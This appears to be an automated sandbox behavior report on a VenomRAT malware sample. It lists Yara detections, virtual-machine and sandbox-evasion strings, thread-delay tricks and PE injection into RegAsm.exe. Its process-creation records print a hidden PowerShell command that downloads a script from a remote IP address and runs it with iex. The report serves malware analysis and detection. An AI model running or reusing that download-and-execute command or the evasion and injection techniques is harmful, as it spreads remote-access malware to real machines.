Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Yara detected VenomRAT

Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2CF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4899	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4904	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4283	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5408	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 2310	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 7475	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Windows\Temp\iviewers.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.dll			Jump to dropped file

Source: C:\Windows\Temp\Package.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-15242

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 4283 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 5408 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep time: -16602069666338586s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7976	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 8112	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: RegAsm.exe, 0000000B.00000002.4116633186.0000000001098000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000000.00000002.1722961877.000001D32F28D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4131548515.00000000053D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VirtualMachine:
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000006.00000002.1750613559.00000000005DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: VMwareVBoxAAntiAnalysis : Hosting detected!AAntiAnalysis : Process detected!QAntiAnalysis : Virtual machine detected!AAntiAnalysis : SandBox detected!CAntiAnalysis : Debugger detected!
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegAsm.exe, 0000000B.00000002.4131548515.00000000053D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnv
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_0020FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0020FE37

Source: C:\Windows\Temp\Package.exe

3_2_001FB905

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_6C4E86D4 GetProcessHeap,

3_2_6C4E86D4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Temp\Package.exe	Code function: 3_2_0020FAC0 SetUnhandledExceptionFilter,	3_2_0020FAC0
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_0020F4CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0020F4CC
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_0020FE37 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0020FE37
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_6C4E1865 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C4E1865
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_6C4E5312 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C4E5312
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_6C4E1386 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C4E1386

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 6.2.powershell.exe.8100000.11.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 6.2.powershell.exe.8100000.11.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
Source: 6.2.powershell.exe.8100000.11.raw.unpack, ClasserPlus.cs	Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.0.cs

Jump to dropped file

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 700000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 702000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C99008	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Temp\Package.exe C:\Windows\Temp\Package.exe	Jump to behavior
Source: C:\Windows\Temp\Package.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } \| iex"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\envi5f4j\envi5f4j.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3794.tmp" "c:\Users\user\AppData\Local\Temp\envi5f4j\CSC9C647CAA9F2542549472B496F61651E.TMP"	Jump to behavior

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_0020BF00 GetSecurityDescriptorDacl,GetLastError,GetExplicitEntriesFromAclW,SetEntriesInAclW,MakeAbsoluteSD,MakeAbsoluteSD,SetSecurityDescriptorDacl,MakeSelfRelativeSD,LocalAlloc,MakeSelfRelativeSD,RegSetValueExW,LocalFree,

3_2_0020BF00

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_0020DA20 GetCurrentProcess,OpenProcessToken,malloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,free,CloseHandle,

3_2_0020DA20

Source: RegAsm.exe, 0000000B.00000002.4119044743.0000000003211000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.000000000324C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.00000000031C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^q
Source: RegAsm.exe, 0000000B.00000002.4119044743.0000000003211000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.000000000324C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: ProgMan
Source: powershell.exe, 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd!SHELLDLL_DefView
Source: RegAsm.exe, 0000000B.00000002.4119044743.00000000030A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\^qPaste_bin@\^q
Source: RegAsm.exe, 0000000B.00000002.4119044743.0000000003211000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4119044743.000000000324C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager`,^q

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_6C4E1A28 cpuid

3_2_6C4E1A28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
